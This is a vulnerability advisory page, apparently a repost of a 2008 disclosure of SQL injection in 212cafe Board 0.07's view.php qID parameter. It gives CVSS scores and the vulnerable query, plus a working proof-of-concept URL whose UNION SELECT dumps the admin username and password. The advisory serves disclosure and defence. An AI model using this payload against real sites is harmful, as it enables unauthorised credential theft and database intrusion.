212cafe Board 0.07 (view.php qID) SQL Injection Vulnerability

2008-10-24 / 2008-10-25
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

=================================================================== 212cafe Board (view.php qID) Remote SQL Injection Vulnerability =================================================================== AUTHOR : CWH Underground DATE : 26 September 2008 SITE : cwh.citec.us ##################################################### APPLICATION : 212cafe Board VERSION : 0.07 VENDOR : http://www.212cafe.com/ DOWNLOAD : http://php.deeserver.net/download/get/12/212cafeboard_v0_07.zip ##################################################### --- Remote SQL Injection --- ** Magic Quote must turn off ** ----------------------------------- Vulnerable File (view.php) ----------------------------------- $query="SELECT * FROM board_question WHERE (qID='$qID')"; --------- Exploit --------- [+] http://[Target]/[212cafeboard]/view.php?qID=[SQL Injection] ------ POC ------ [+] http://[Target]/[212cafeboard]/view.php?qID=-9999')/**/UNION/**/SELECT/**/1,concat(mUser,0x3a3a,mPasswd),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/board_member/**/WHERE/**/(mID='1 ##################################################################### Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #####################################################################

References:

http://xforce.iss.net/xforce/xfdb/45428
http://www.securityfocus.com/bid/31426
http://www.milw0rm.com/exploits/6578


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top